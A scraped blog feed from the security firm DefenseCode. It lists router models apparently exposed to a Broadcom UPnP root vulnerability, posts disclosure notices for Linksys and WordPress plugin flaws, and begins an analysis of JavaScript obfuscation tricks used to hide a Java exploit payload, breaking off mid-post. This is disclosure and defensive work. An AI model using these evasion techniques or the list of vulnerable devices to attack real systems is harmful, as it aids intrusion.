- Wireless Router<br />
<br />
<br />
<br />
MAXON<br />
<br />
- Residential Gateway Device<br />
<br />
<br />
<br />
MEDIACOM Wireless-N ADSL2+ Router<br />
<br />
MEDIACOM Wireless-N ADSL2+ Router - ADSL2+ Router<br />
<br />
<br />
<br />
Micronet Communications Inc.<br />
<br />
- Micronet WLAN ADSL2+ Modem Router<br />
<br />
<br />
<br />
Micro-Star International<br />
<br />
- Residential Gateway Device<br />
<br />
<br />
<br />
Minitar Corporation<br />
<br />
- Residential Gateway Device<br />
<br />
<br />
<br />
Motorola<br />
<br />
- Residential Gateway Device<br />
<br />
<br />
<br />
NB<br />
<br />
- DSL-2740B<br />
<br />
<br />
<br />
NetComm<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
NetComm Limited<br />
<br />
- NetComm ADSL2+ Router<br />
<br />
- NetComm ADSL2+ Wireless Router<br />
<br />
- 11n Wireless ADSL2+ Router<br />
<br />
- 11n Wireless ADSL Router<br />
<br />
- Netcomm ADSL2+/3G Wi-Fi Router<br />
<br />
- ADSL2+ Router<br />
<br />
- ADSL2+ Wireless Router<br />
<br />
- NB6 ADSL2+ Router<br />
<br />
- NB6Plus4W ADSL2+ Wireless Modem Router<br />
<br />
- NB6PLUS4W Wireless ADSL2+ Router<br />
<br />
- NB6W Wireless ADSL2+ Router<br />
<br />
- WiFi Data and VoIP Gateway<br />
<br />
<br />
<br />
NetComm Wireless Limited<br />
<br />
- NetComm ADSL2+ Router<br />
<br />
- NetComm ADSL2+ Wireless Router<br />
<br />
<br />
<br />
Netgear<br />
<br />
- Broadcom ADSL Router<br />
<br />
- ADSL2+ Router<br />
<br />
- ADSL Router<br />
<br />
- RP614v4<br />
<br />
<br />
<br />
Neuf Telecom<br />
<br />
- Trio4<br />
<br />
<br />
<br />
NewMedia-NET GmbH<br />
<br />
- DD-WRT Router (X.X.X.X)<br />
<br />
<br />
<br />
OPTICOM<br />
<br />
- DSLink 279<br />
<br />
<br />
<br />
Orcon<br />
<br />
- Genius<br />
<br />
- GeniusLite<br />
<br />
- Orcon<br />
<br />
- P-660HN-51<br />
<br />
<br />
<br />
PENTAGRAM<br />
<br />
- home.gateway<br />
<br />
<br />
<br />
PhoebeMicro<br />
<br />
- Internet Gateway Device<br />
<br />
<br />
<br />
Pirelli<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
Pirelli Broadband Solutions<br />
<br />
- HomeStation ADSL Router<br />
<br />
<br />
<br />
PLANET<br />
<br />
- ADN-4000<br />
<br />
<br />
<br />
Planex<br />
<br />
- BLW-54CW<br />
<br />
- Internet Gateway Device<br />
<br />
<br />
<br />
QTECH<br />
<br />
-<br />
<br />
- Broadcom ADSL Router<br />
<br />
- QTECH<br />
<br />
- Residential Gateway<br />
<br />
- ResidentialGatewayDevice<br />
<br />
<br />
<br />
ROTAL<br />
<br />
- Wireless ADSL2+ Router<br />
<br />
<br />
<br />
Router<br />
<br />
- ADSL Router<br />
<br />
- Router<br />
<br />
<br />
<br />
Sagem<br />
<br />
- AFAQ DSL SHAMEL ROUTER<br />
<br />
<br />
<br />
Sagemcom<br />
<br />
- ADSL Router<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
SemIndia Systems Private Ltd.<br />
<br />
- SemIndia ADSL2Plus Modem/Router<br />
<br />
<br />
<br />
SemIndia Systems Pvt. Ltd.<br />
<br />
- SemIndia Systems ADSL2Plus Modem Router<br />
<br />
- SemIndia Systems ADSL2Plus Modem/Wireless Router<br />
<br />
<br />
<br />
SIEMENS<br />
<br />
- alice.box<br />
<br />
<br />
<br />
Siemens<br />
<br />
- ADSL SL2-141<br />
<br />
- ADSL SL2-141-I<br />
<br />
- Gigaset SE515B<br />
<br />
- SL2-141-I<br />
<br />
<br />
<br />
SimpleTech<br />
<br />
- OdenShare<br />
<br />
- SimpleShare<br />
<br />
<br />
<br />
Sinus<br />
<br />
- 1054 DSL<br />
<br />
<br />
<br />
SmartLink<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
Sparklan<br />
<br />
- Internet Gateway Device<br />
<br />
<br />
<br />
Speedport<br />
<br />
- 500V<br />
<br />
- W 500V<br />
<br />
<br />
<br />
Starbridge Networks<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
Star-Net<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
STAR-NET<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
Sveasoft Inc.<br />
<br />
- Residential Gateway Device<br />
<br />
<br />
<br />
TARGA WR 500 VoIP<br />
<br />
- TARGA WR 500 VoIP<br />
<br />
<br />
<br />
Tecom<br />
<br />
- DSL Router<br />
<br />
<br />
<br />
TeleWell Oy (http://www.telewell.fi)<br />
<br />
TeleWell Oy (http://www.telewell.fi) - TeleWell.gateway<br />
<br />
<br />
<br />
Telsey<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
TELUS<br />
<br />
- VSG1432<br />
<br />
<br />
<br />
Tenda<br />
<br />
- ADSL2/2+ Modem Router<br />
<br />
<br />
<br />
Tenda/Imex<br />
<br />
- W150D<br />
<br />
<br />
<br />
Tenda/lmex<br />
<br />
- ADSL2+ Ethernet Modem Router<br />
<br />
- ADSL Router<br />
<br />
- Gateway<br />
<br />
<br />
<br />
TOPTRONICS<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
TP-LINK<br />
<br />
- ADSL Router<br />
<br />
- 54M Wireless ADSL2+ router<br />
<br />
- ADSL2+ Modem Router<br />
<br />
- ADSL2+ Router<br />
<br />
- ADSL2+ Router Modem<br />
<br />
- ADSL Router<br />
<br />
- Wireless ADSL2+ Modem Router<br />
<br />
- Wireless ADSL2+ router<br />
<br />
- Wireless ADSL2+ Router<br />
<br />
- Wireless N ADSL2+ Modem Router TD-W8960N<br />
<br />
<br />
<br />
U.S. Robotics Corporation<br />
<br />
- Internet Gateway Device<br />
<br />
<br />
<br />
U.S. Robotics<br />
<br />
- USRobotics ADSL2+ Router<br />
<br />
- ADSL 4 Port Router<br />
<br />
- ADSL 4-Port Router<br />
<br />
- USR8561<br />
<br />
<br />
<br />
UTStarcom Inc.<br />
<br />
- UTStarcom ADSL2+ Modem Router<br />
<br />
<br />
<br />
UTstarcom Inc.<br />
<br />
- UTstarcom ADSL2+ Modem/Wireless Router<br />
<br />
- UTStarcom ADSL2+ Modem/Wireless Router<br />
<br />
- VSG1432-B101<br />
<br />
- VSG1435-B101<br />
<br />
<br />
<br />
WIN<br />
<br />
- eNet660S<br />
<br />
<br />
<br />
WorldNet<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
XAVi<br />
<br />
- DSL Router<br />
<br />
<br />
<br />
Zhone Technologies.<br />
<br />
- UPnP v1.0<br />
<br />
<br />
<br />
Zhone<br />
<br />
- Gateway<br />
<br />
- Wireless Gateway<br />
<br />
<br />
<br />
ZISA<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
ZTE<br />
<br />
- ADSL Router<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
ZTE Corporation<br />
<br />
- ZXDSL 931 Series Device<br />
<br />
- Home Gateway<br />
<br />
- ZXDSL 531B<br />
<br />
<br />
<br />
ZyXEL Communication Crop.<br />
<br />
- P-870H-51A V2 UPnP<br />
<br />
- P-870H-51b UPnP<br />
<br />
- P-870H-53A V2 UPnP<br />
<br />
- P-870HN-51b UPnP<br />
<br />
- P-870HN-51D UPnP<br />
<br />
- P-870HN-53b UPnP<br />
<br />
- P-870HNU-51b<br />
<br />
- VSG1435-B101<br />
<br />
- Wireless Broadband Router<br />
<br />
- ZyXEL UPnP v1.0<br />
<br />
<br />
<br />
ZyXEL<br />
<br />
- P-660HN-51<br />
<br />
- P-870HN-53b<br />
<br />
- P-873HNU-51B<br />
<br />
- P-873HNUP-51B<br />
<br />
- Qwest TR-064 v1.0<br />
<br />
- VMG1312-B30A<br />
<br />
- VSG1432-B101<br />
<br />
- VSG1435-B101<br />
<br />
- ADSL Router<br />
<br />
- TR64 Router<br />
<br />
- UPnP Router<br />
<br />
- VDSL Router<br />
<br />
<br />
<br />
ZYXEL<br />
<br />
- ZyXEL VDSL Router<br />
<br />
- xDSL Router<br />
<div>
<br /></div>
DefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com552tag:blogger.com,1999:blog-5480238770642622663.post-17234674662918166522013-01-30T19:32:00.001-08:002013-01-30T19:32:29.166-08:00Broadcom UPnP Remote Preauth Root Code Execution Vulnerability<br />
During the security evaluation of Cisco Linksys routers for a client, we have discovered a critical<br />
security vulnerability that allows remote unauthenticated attacker to remotely execute arbitrary code<br />
under root privileges.<br />
Upon initial vulnerability announcement a few weeks ago Cisco spokesman stated that only one router<br />
model is vulnerable - WRT54GL.<br />
We have continued with our research and found that, in fact, same vulnerable firmware component<br />
is also used in at least two other Cisco Linksys models - WRT54G3G and probably WRT310N.<br />
Could be others.<br />
<br />
Moreover, vulnerability turns out even more dangerous, since we have discovered that same vulnerable<br />
firmware component is also used across many other big-brand router manufacturers and many<br />
smaller vendors.<br />
<br />
Vulnerability itself is located in Broadcom UPnP stack, which is used by many router manufacturers<br />
that produce or produced routers based on Broadcom chipset.<br />
We have contacted them with vulnerability details and we expect patches soon.<br />
However, we would like to point out that we have sent more than 200 e-mails to various router<br />
manufacturers and various people, without much success.<br />
<br />
Some of the manufacturers contacted regarding this vulnerability are:<br />
- Broadcom<br />
- Asus<br />
- Cisco<br />
- TP-Link<br />
- Zyxel<br />
- D-Link<br />
- Netgear<br />
- US Robotics<br />
- and so on.<br />
<br />
Full vulnerability description is available here:<br />
<a href="http://www.defensecode.com/subcategory/advisories-28">http://www.defensecode.com/subcategory/advisories-28</a><br />
<br />
Regards,<br />Leon Juranic<br />
CEO<br />
DefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com324tag:blogger.com,1999:blog-5480238770642622663.post-241460643037071692013-01-17T12:57:00.000-08:002013-01-17T12:57:58.695-08:00DefenseCode Security Advisory (UPCOMING): Cisco Linksys Remote Preauth 0day Root Exploit Follow-UpStarting a few hours ago, we began a quick analysis as to how many
Linksys models might be vulnerable. <br />
From what we can tell so far, at least one other (not just the
WRT54GL) Linksys model is probably vulnerable.
<br />
<br />
Moreover, during the analysis we discovered clues that network
devices from other manufacturers might <br />
also contain the same vulnerability. We are still investigating.
<br />
<br />
Regarding the Cisco case, we are looking forward to the
vulnerability fix. In the meantime, we have again approached them about a few other potential vulnerabilities in the Linksys
equipment. <br />
<br />
<br />
Regards,<br />
Leon Juranic<br />
CEO<br />
DefenseCode<br />
<a class="moz-txt-link-freetext" href="http://www.defensecode.com/">http://www.defensecode.com/</a>DefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com182tag:blogger.com,1999:blog-5480238770642622663.post-79878339553737640882013-01-11T05:12:00.004-08:002013-01-11T05:13:25.488-08:00DefenseCode Security Advisory (UPCOMING): Cisco Linksys Remote Preauth 0day Root Exploit <div>
Story behind the vulnerability...</div>
<div>
<br /></div>
<div>
Months ago, we've contacted Cisco about a remote preauth (root access) vulnerability</div>
<div>
in default installation of their Linksys routers that we've discovered. We gave them</div>
<div>
detailed vulnerability description along with the PoC exploit for the vulnerability.</div>
<div>
<br /></div>
<div>
They said that this vulnerability was already fixed in latest firmware release...</div>
<div>
Well, not this particular vulnerability, since the latest official Linksys firmware -</div>
<div>
4.30.14, and all previous versions are still vulnerable.</div>
<div>
<br /></div>
<div>
Exploit shown in this video has been tested on Cisco Linksys WRT54GL, but other </div>
<div>
Linksys versions/models are probably also affected.</div>
<div>
Cisco Linksys is a very popular router with more than 70,000,000 routers sold.</div>
<div>
That's why we think that this vulnerability deserves attention.</div>
<div>
<br /></div>
<div>
According to our vulnerability disclosure policy, the vulnerability details will be</div>
<div>
disclosed in following 2 weeks on http://www.defensecode.com/ , BugTraq and</div>
<div>
Full Disclosure.</div>
<div>
Due to the severity of this vulnerability, once again we would like to urge Cisco</div>
<div>
to fix this vulnerability.</div>
<div>
<br /></div>
<div>
The vulnerability is demonstrated in the following video:</div>
<div>
<a href="http://www.youtube.com/watch?v=cv-MbL7KFKE&hd=1">http://www.youtube.com/watch?v=cv-MbL7KFKE&hd=1</a></div>
<div>
<br /></div>
<div>
Kind Regards,</div>
<div>
DefenseCode</div>
DefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com272tag:blogger.com,1999:blog-5480238770642622663.post-83452928194126403912012-11-23T08:55:00.001-08:002012-11-23T08:59:39.590-08:00Soon to be expected...Hi folks,<br />
<br />
We're working very hard on new stuff and security research, so very soon DefenseCode will release some interesting stuff... Like...<br />
<br />
- Cisco Linksys remote preauth 0day root exploit<br />
- Vulnerabilities in software from NASA<br />
- Free Internet tricks....<br />
- ThunderScan Source Code Security Analysis software for Android apps<br />
- Web Security Scanner<br />
- BlackTitan Internet Security with advanced JavaScript Malware analysis engine<br />
<br />
Stay tuned.. :)<br />
<br />
Regards,<br />
DefenseCodeDefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com118tag:blogger.com,1999:blog-5480238770642622663.post-26921869177922025402012-11-12T14:10:00.002-08:002012-11-12T14:13:40.618-08:00Vulnerabilities in WP E-Commerce plugin for WordPress<br />
DefenseCode released Security Advisory DC-2012-11-001 to address an issue that affects Wordpress WP E-Commerce Plugin, one which has more than 2 million downloads and is one of the most popular for WordPress. Advisory covered multiple vulnerabilities that were discovered during the security audit of the mentioned plugin. All vulnerabilities were discovered using DefenseCode's ThunderScan PHP, web application source code security analyzer. Bugs found by ThunderScan are High risk SQL injections and Cross Site Scripting which attacker can use to compromise the targeted system. DefenseCode has contacted the vendor and the vulnerabilities are fixed in the latest WP e-Commerce release (3.8.9.1).<br />
<br />
You can find more details about the advisory <a href="http://www.defensecode.com/article/wordpress_wp_e-commerce_plugin_multiple_security_vulnerabilities_-30">here</a>.<br />
<br />
Soon, we’ll release a lot more vulnerabilities discovered by our ThunderScan software. Also, we’ll release a few interesting 0day vulnerabilities not related to web applications, so make sure that you’re subscribed to our RSS feed.<br />
<br />
Regards,<br />
DefenseCodeAnonymousnoreply@blogger.com186tag:blogger.com,1999:blog-5480238770642622663.post-57154719411805972592012-10-11T11:03:00.002-07:002012-10-11T11:04:23.567-07:00Announcement: DefenseCode ThunderScan v1.1 - Web Application Source Code Security AnalysisWe are proud to present you a new product for comprehensive Web
Application Security Scanning.<br />
DefenseCode ThunderScan v1.1 for Web Application Source Code
Security Analysis is available now.<br />
<br />
Demo run against Mutillidae v1.3 can be seen here:<br />
<a href="http://www.youtube.com/watch?v=dcml2stPYNM&hd=1">http://www.youtube.com/watch?v=dcml2stPYNM&hd=1</a><br />
<br />
DefenseCode ThunderScan products are designed for comprehensive
security assessment of web application source code in<br />
order to discover critical security vulnerabilities that hackers
could exploit to compromise web application security. <br />
<br />
More information about the product is available here:<br />
<a href="http://www.defensecode.com/subcategory/thunderscan-8">http://www.defensecode.com/subcategory/thunderscan-8</a><br />
<br />
ThunderScan v1.1 supported languages:<br />
- ASP.Net C#<br />
- PHP<br />
- Java/JSP<br />
- VB.Net<br />
- Classic ASP<br />
<br />
Thunderscan v1.1 will scan web applications for a wide range of
security vulnerabilities like:<br />
- SQL Injection<br />
- File Disclosure<br />
- Page Inclusion<br />
- Code Injection<br />
- Shell Command Execution<br />
- Cross Site Scripting<br />
- File Manipulation<br />
- Arbitrary File Upload<br />
- Dangerous Configuration Settings<br />
- Arbitrary Server Connection<br />
- XPATH Injection<br />
- LDAP Injection<br />
- HTTP Response Splitting<br />
- Information Leak<br />
- Mail Relay<br />
- Misc. Dangerous Functions<br />
- Dangerous File Extensions<br />
- And more<br />
<br />
<br />
ThunderScan v1.1 New Features:<br />
- Tainted input flow track interactive analysis<br />
- Automated discovery of custom input functions<br />
- Improved custom functions analysis<br />
- Improved filter detection<br />
- Custom filtering functions detection<br />
- Improved large multiline code handling<br />
- Improved input tracking across multiple functions<br />
- Fixed bug in XML reporting<br />
- Improved Java and C# class detection<br />
- Improved Java and C# class analysis<br />
- Advanced PHP static inclusion algorithm<br />
- Improved PHP PEAR tracking functions base<br />
- Added Java JSON-RPC support<br />
<br />
We are continuously working on improving our products and keeping
them up to date <br />
so you can be sure that all the latest threats get detected.<br />
<br />
Kind Regards<br />
--<br />
DefenseCode Team<br />
<span style="color: #999999;">ThunderScan - Scan your Web
Application For Security Vulnerabilities<br />
</span><span style="color: #999999;"><a class="moz-txt-link-freetext" href="http://www.defensecode.com/subcategory/thunderscan-8">http://www.defensecode.com/subcategory/thunderscan-8</a></span>DefenseCodehttp://www.blogger.com/profile/18242007483588528023noreply@blogger.com116tag:blogger.com,1999:blog-5480238770642622663.post-70268988727277889652012-10-07T16:34:00.001-07:002012-10-07T17:38:05.970-07:00Diving into recent 0day Javascript obfuscations<h2>
Introduction</h2>
<div>
<div>
One of the most common ways for an attacker to infect system over the Internet is using Javascript. Typical Web exploitation frameworks like Blackhole utilize polimorphic Javascript as a personalized payloads for every victim. By employing various obfuscations they are able to evade static signatures and reduce anti-virus detection rates.</div>
<div>
In this post we will analyze one of such Javascript obfuscators called Dadong's JSXX that was used to obfuscate the payload of a recent Java 0day (CVE-2012-4681) exploit that was found in the wild and has since been patched by Oracle and it is recommended that you apply the security patch to ensure maximum protection.<br />
DefenseCode <a href="http://www.defensecode.com/subcategory/blacktitan-10">BlackTitan Internet Security </a>customers are protected from described exploit with <a href="http://www.defensecode.com/subcategory/blacktitan-10">BlackTitan </a>malware signatures BTSIG9612, BTSIG9613 and BTSIG9615.<br />
<br /></div>
</div>
<h2>
Analysis of Dadong JSXX obfuscated payload</h2>
<div>
Let's first take a look at the fully obfuscated JavaScript code that is generated by the attacker. The following code is generated by the attacker for each visit of the web page serving the exploit which is then responsible for exploiting Java vulnerability and installing malicious software:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeRg3Ckw67N2ihx-0HtkvB4hDZhpY4nEAXNftXn4QnXEAvJXnS0hqC17YGbVlOtqtALwfUd_5ZPwmStATfUYAaTXx_xkr2RdiRy-8e9XoNvaHvdMyeSMTxhRj_D4UhYlrH98zd53__drc/s1600/dc_js.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeRg3Ckw67N2ihx-0HtkvB4hDZhpY4nEAXNftXn4QnXEAvJXnS0hqC17YGbVlOtqtALwfUd_5ZPwmStATfUYAaTXx_xkr2RdiRy-8e9XoNvaHvdMyeSMTxhRj_D4UhYlrH98zd53__drc/s1600/dc_js.PNG" /></a></div>
<div>
<br /></div>
<div>
<div>
First thing we can notice is that this code was not designed to be easy to understand and analyze. In fact it is designed to thwart static analysis and automated deobfuscation tools so that it can stay undetected longer.</div>
<div>
While looking at the obfuscated code several things become obvious:</div>
</div>
<div>
<div>
<ul>
<li>Code alignment and flow structure is not preserved</li>
<li>Original variable and function names are replaced by random strings</li>
<li>Various additional obfuscations introduced to additionally deter analysis</li>
</ul>
</div>
</div>
<div>
To get a better understanding of the code we will tackle all of the mentioned observations in a attempt to fully understand it.<br />
<br /></div>
<h3>
Recovering code alignment and flow structure</h3>
<div>
Most development editors and environments have basic code prettify functionality that will allow you to format code into a more readable structure. Malzilla is described as a "malware hunting tool" and has ability to format obfuscated javascript code into a much nicer layout. Some manual formatting or regex replacements may be necessary to do some final touches on the formatted code until we are fully satisfied with the results. After we are satisfied with the code layout we can proceed to the next step.<br />
<br /></div>
<h3>
Recovering function and variable names</h3>
<div>
<div>
While analyzing the code we uncover semantics of functions and variables and should rename them as we advance trough the code. Every new renamed variable/function will speed up further analysis and reduce the time to cover all the code. Names should be concise and have clear meaning associated with them so all subsequent encounters of that variable/function are quickly recognized and can be skipped.</div>
<div>
Following is an example of code before and after renaming process.</div>
<div>
Obfuscated code:</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6n2VmbZQN42QrXgETBce6mMPxECbEcSndiGblWEz1pYxCiBC5E4apzOJ375V-Z_HUJ8GMuFJ6XhGmiUo2RaSarfSXeOYlFTHwMY6kDkEfx22xt3-5Xo69wRa-dJdghIbMiWAHvL_He8w/s1600/blog1pic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6n2VmbZQN42QrXgETBce6mMPxECbEcSndiGblWEz1pYxCiBC5E4apzOJ375V-Z_HUJ8GMuFJ6XhGmiUo2RaSarfSXeOYlFTHwMY6kDkEfx22xt3-5Xo69wRa-dJdghIbMiWAHvL_He8w/s640/blog1pic.png" width="640" /></a></div>
</div>
<div>
<br />
Renamed code:</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsuXBazB6VJ09zH6p5aFDl4s-PsKssRf_EwY2dbeWBpmdB6RzzScH8QPIaJgNm0Z65OEkuyZ07W9yMHtsLsfgW26o2tcv7GTNNdBavZwkdXUZI-bx0_yfQfbD2ASIlROacB0L5dy2oxhc/s1600/blog2pic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="24" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsuXBazB6VJ09zH6p5aFDl4s-PsKssRf_EwY2dbeWBpmdB6RzzScH8QPIaJgNm0Z65OEkuyZ07W9yMHtsLsfgW26o2tcv7GTNNdBavZwkdXUZI-bx0_yfQfbD2ASIlROacB0L5dy2oxhc/s640/blog2pic.png" width="640" /></a></div>
<br />
<br />
<h3>
Common JavaScript obfuscations</h3>
</div>
</div>
<div>
<div>
After code has been properly formatted we can see additional obfuscations introduced to the code. Let's now examine common JavaScript obfuscations on this sample.<br />
<br /></div>
<h3>
Hiding use of eval()</h3>
</div>
<div>
<div>
One of the most commonly used JavaScript obfuscations is using eval() function to run code stored as a string in a variable. This obfuscator is no different and uses several different eval() obfuscations.</div>
<div>
To hide uses of eval() the code will assign function to various randomly named variables in an attempt to disguise eval usage. The following code snippet shows several steps used to hide eval() from static analysis.<br />
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX5kjJB-JnTwfgcLgJBvdNIMxnKORuEQhVxbLV_P5TzgpCZDgg5SqMIsQ0dLE3eeU_3jzxU54CW45E-Fe-64AxAskXExNel_48gd0SMqM2zgjorqOn6TZjw0TIoW76mGs3p8rQhoDptVo/s1600/blog3pic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX5kjJB-JnTwfgcLgJBvdNIMxnKORuEQhVxbLV_P5TzgpCZDgg5SqMIsQ0dLE3eeU_3jzxU54CW45E-Fe-64AxAskXExNel_48gd0SMqM2zgjorqOn6TZjw0TIoW76mGs3p8rQhoDptVo/s640/blog3pic.png" width="640" /></a></div>
<br />
This technique of hiding functions is not reserved just for eval() but it is typically used to obfuscate usage of all functions that could be used to statically identify malicious code.</div>
<div>
Slightly more advanced example of assigning eval to a variable is use using string transformations to build eval string. One such example is inserting junk characters in between eval letters and then removing them dynamically with regular expressions. With this simple rule it is possible to generate polymorphic eval assignments.</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvVLlis8uCZMBxyPVgWpJod5koKzW5FPkwFKDxIV8-jDPBfyY96O1-lM0SIHIR4vwJTmQHl9pszz6A1QdFeDRDaQTS26WSUaHsA4cHj6n1CWTk5fkkyMEMt1xCitFc25MtLlUK_tAM0-Y/s1600/blog4pic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="37" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvVLlis8uCZMBxyPVgWpJod5koKzW5FPkwFKDxIV8-jDPBfyY96O1-lM0SIHIR4vwJTmQHl9pszz6A1QdFeDRDaQTS26WSUaHsA4cHj6n1CWTk5fkkyMEMt1xCitFc25MtLlUK_tAM0-Y/s640/blog4pic.png" width="640" /></a></div>
<br /></div>
<div>
Previous expression will remove all characters from the string except those listed in the regular expression, which is equivalent to the following:</div>
<div>
eval2=eval('eval');<br />
<br /></div>
<h3>
Opaque predicates</h3>
</div>
<div>
<div>
Opaque predicate is defined as an expression for which outcome is predetermined to be always true or false. Most simple example of this is expression if( true ). Malware authors use opaque predicates to thwart static analysis tools by constructing expressions that are not so simple to determine without evaluating them inside the targeted environment. Dadong JSXX uses mathematical functions to build opaque predicates which are then used as arguments in loops. Let's examine one of the expressions used as opaque predicate:</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirtBSx4KrEgVozo8LEjVBmcpGvn0vJDqT1iWkQXAGEQyurIxNeSKLkP3eBf6QO4zJZxTFL9QQ5wc8ON5GaW10cF-6zr5l8VOk3RbadwikogaxqE1q98ZkHW5i6esQWWTMOxcDSZJMsoQ0/s1600/blog5pic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="24" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirtBSx4KrEgVozo8LEjVBmcpGvn0vJDqT1iWkQXAGEQyurIxNeSKLkP3eBf6QO4zJZxTFL9QQ5wc8ON5GaW10cF-6zr5l8VOk3RbadwikogaxqE1q98ZkHW5i6esQWWTMOxcDSZJMsoQ0/s640/blog5pic.png" width="640" /></a></div>
<br /></div>
<div>
We can divide the expression into groups and evaluate each of the logical expressions:</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFFGQ-2XVFlzWRBq1CHHsSdVYU1pkIHyVMdH0HzpZ_kQvFnLaMBVIZfUy3Sqvr_lfT4X6bL5BX6MBIXAv79mo9Ps7k3h5JowICr8zZfrDGz200lTuXJWhzV2-4aHlHOP7s4S8YZ0q-1PQ/s1600/blog6pic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFFGQ-2XVFlzWRBq1CHHsSdVYU1pkIHyVMdH0HzpZ_kQvFnLaMBVIZfUy3Sqvr_lfT4X6bL5BX6MBIXAv79mo9Ps7k3h5JowICr8zZfrDGz200lTuXJWhzV2-4aHlHOP7s4S8YZ0q-1PQ/s1600/blog6pic.png" /></a></div>
<br /></div>
<div>
Inserting the results into original expression we have:</div>
<div>
~(0 | ( 1 | 0 & 0)) = ~( 0 | 1 ) = ~1 = 0</div>
<div>
<br /></div>
<div>
So the previous complicated expression will always evaluate to 0 and can effectively be rewritten as:</div>
<div>
fExpression_eq0 = 0;</div>
<div>
<br /></div>
<div>
Chaining multiple opaque predicates in different variables makes it harder to statically determine what actually is an opaque predicate and what is a non-reducible expression.<br />
<br /></div>
<h3>
Self-referencing decryption</h3>
</div>
<div>
<div>
One very interesting method against code formatting is using self referencing decryption. Let's examine the following code snippet:<br />
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvulzb38vXyMBhNNg9EwLOLJ-lU0zPWYvHqTUjJQHrVIfKVo8uV5Vx2S-CTfk1xpbXT2fjAB_8Kl1Nh2VOC2QJXfUFdtZTS-i3d-oo6LLRC6jJAKDyk5kkRsWbjHIhvGmBwmglCX40rmw/s1600/blog7pic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="32" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvulzb38vXyMBhNNg9EwLOLJ-lU0zPWYvHqTUjJQHrVIfKVo8uV5Vx2S-CTfk1xpbXT2fjAB_8Kl1Nh2VOC2QJXfUFdtZTS-i3d-oo6LLRC6jJAKDyk5kkRsWbjHIhvGmBwmglCX40rmw/s640/blog7pic.png" width="640" /></a></div>
<br /></div>
<div>
Rewritten for easier understanding:<br />
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjawAdfPgtnDL4cxn3WXfKktbhX2bkIU2a8mz9BCoaAIiYJzsLMDVvj2yaVn4kIk4obLwQqKCipboshfWg2Akm1WfNjeDArnnzs1fvbbM67WoW73mj60sHacT97IahfMBga7914RnD_UUc/s1600/blog8pic.png" imageanchor="1" style="display: inline !important; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="58" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjawAdfPgtnDL4cxn3WXfKktbhX2bkIU2a8mz9BCoaAIiYJzsLMDVvj2yaVn4kIk4obLwQqKCipboshfWg2Akm1WfNjeDArnnzs1fvbbM67WoW73mj60sHacT97IahfMBga7914RnD_UUc/s640/blog8pic.png" width="640" /></a></div>
</div>
<div>
<br /></div>
<div>
aCodeAsString, originally named sBtEp6, is referencing itself inside the string that is evaluated so any modification or formatting of the aCodeAsString will result in unsuccessful decryption of the final payload effectively preventing any modifications to the code.<br />
<br /></div>
<h3>
Encrypted code</h3>
</div>
<div>
<div>
